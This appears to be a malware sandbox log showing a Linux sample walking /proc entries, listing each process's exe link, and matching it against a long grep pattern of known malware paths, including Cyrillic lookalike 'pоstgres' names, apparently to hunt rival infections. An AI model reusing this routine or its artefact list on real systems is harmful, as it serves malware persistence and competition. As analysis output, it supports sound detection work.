/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:870
-
-
/bin/grepgrep exe4⤵PID:873
-
-
/bin/lsls -latrh /proc/194⤵PID:872
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:875
-
-
/bin/grepgrep exe4⤵PID:878
-
-
/bin/lsls -latrh /proc/24⤵PID:877
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:880
-
-
/bin/grepgrep exe4⤵PID:883
-
-
/bin/lsls -latrh /proc/204⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:885
-
-
/bin/grepgrep exe4⤵PID:888
-
-
/bin/lsls -latrh /proc/214⤵PID:887
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:890
-
-
/bin/grepgrep exe4⤵PID:893
-
-
/bin/lsls -latrh /proc/224⤵
- Reads runtime system information
PID:892
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:895
-
-
/bin/grepgrep exe4⤵PID:898
-
-
/bin/lsls -latrh /proc/234⤵PID:897
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:900
-
-
/bin/grepgrep exe4⤵PID:903
-
-
/bin/lsls -latrh /proc/244⤵PID:902
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:905
-
-
/bin/grepgrep exe4⤵PID:909
-
-
/bin/lsls -latrh /proc/2544⤵PID:908
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:912
-
-
/bin/grepgrep exe4⤵PID:916
-
-
/bin/lsls -latrh /proc/34⤵PID:915
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:919
-
-
/bin/grepgrep exe4⤵PID:922
-
-
/bin/lsls -latrh /proc/3354⤵PID:921
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:925
-
-
/bin/grepgrep exe4⤵PID:929
-
-
/bin/lsls -latrh /proc/3364⤵PID:928
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:932
-
-
/bin/grepgrep exe4⤵PID:936
-
-
/bin/lsls -latrh /proc/364⤵PID:935
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:938
-
-
/bin/grepgrep exe4⤵PID:942
-
-
/bin/lsls -latrh /proc/3614⤵PID:941
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:945
-
-
/bin/grepgrep exe4⤵PID:949
-
-
/bin/lsls -latrh /proc/3624⤵PID:948
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:952
-
-
/bin/grepgrep exe4⤵PID:955
-
-
/bin/lsls -latrh /proc/3634⤵PID:954
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:959
-
-
/bin/grepgrep exe4⤵PID:962
-
-
/bin/lsls -latrh /proc/374⤵PID:961
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:965
-
-
/bin/grepgrep exe4⤵PID:969
-
-
/bin/lsls -latrh /proc/3874⤵PID:968
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:971
-
-
/bin/grepgrep exe4⤵PID:975
-
-
/bin/lsls -latrh /proc/3904⤵PID:974
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:978
-
-
/bin/grepgrep exe4⤵PID:982
-
-
/bin/lsls -latrh /proc/3964⤵PID:981
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:985
-
-
/bin/grepgrep exe4⤵PID:988
-
-
/bin/lsls -latrh /proc/44⤵PID:987
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:992
-
-
/bin/grepgrep exe4⤵PID:995
-
-
/bin/lsls -latrh /proc/4444⤵PID:994
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:998
-
-
/bin/grepgrep exe4⤵PID:1002
-
-
/bin/lsls -latrh /proc/54⤵PID:1001
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1004
-
-
/bin/grepgrep exe4⤵PID:1008
-
-
/bin/lsls -latrh /proc/64⤵PID:1007
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1011
-
-
/bin/grepgrep exe4⤵PID:1015
-
-
/bin/lsls -latrh /proc/6814⤵PID:1014
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1018
-
-
/bin/grepgrep exe4⤵PID:1021
-
-
/bin/lsls -latrh /proc/6834⤵PID:1020
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1025
-
-
/bin/grepgrep exe4⤵PID:1029
-
-
/bin/lsls -latrh /proc/6854⤵PID:1028
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1032
-
-
/bin/grepgrep exe4⤵PID:1036
-
-
/bin/lsls -latrh /proc/6864⤵PID:1034
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1039
-
-
/bin/grepgrep exe4⤵PID:1044
-
-
/bin/lsls -latrh /proc/74⤵PID:1043
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1048
-
-
/bin/grepgrep exe4⤵PID:1051
-
-
/bin/lsls -latrh /proc/704⤵PID:1050
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1055
-
-
/bin/grepgrep exe4⤵PID:1058
-
-
/bin/lsls -latrh /proc/7024⤵PID:1057
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1061
-
-
/bin/grepgrep exe4⤵PID:1066
-
-
/bin/lsls -latrh /proc/714⤵PID:1065
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1068
-
-
/bin/grepgrep exe4⤵PID:1072
-
-
/bin/lsls -latrh /proc/7164⤵PID:1071
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1074
-
-
/bin/grepgrep exe4⤵PID:1077
-
-
/bin/lsls -latrh /proc/7174⤵PID:1076
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1079
-
-
/bin/grepgrep exe4⤵PID:1083
-
-
/bin/lsls -latrh /proc/724⤵PID:1082
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"4⤵PID:1085
-
-
/bin/grepgrep exe4⤵PID:1088
-
-
/bin/lsls -latrh /proc/7214⤵PID:1087
-
-
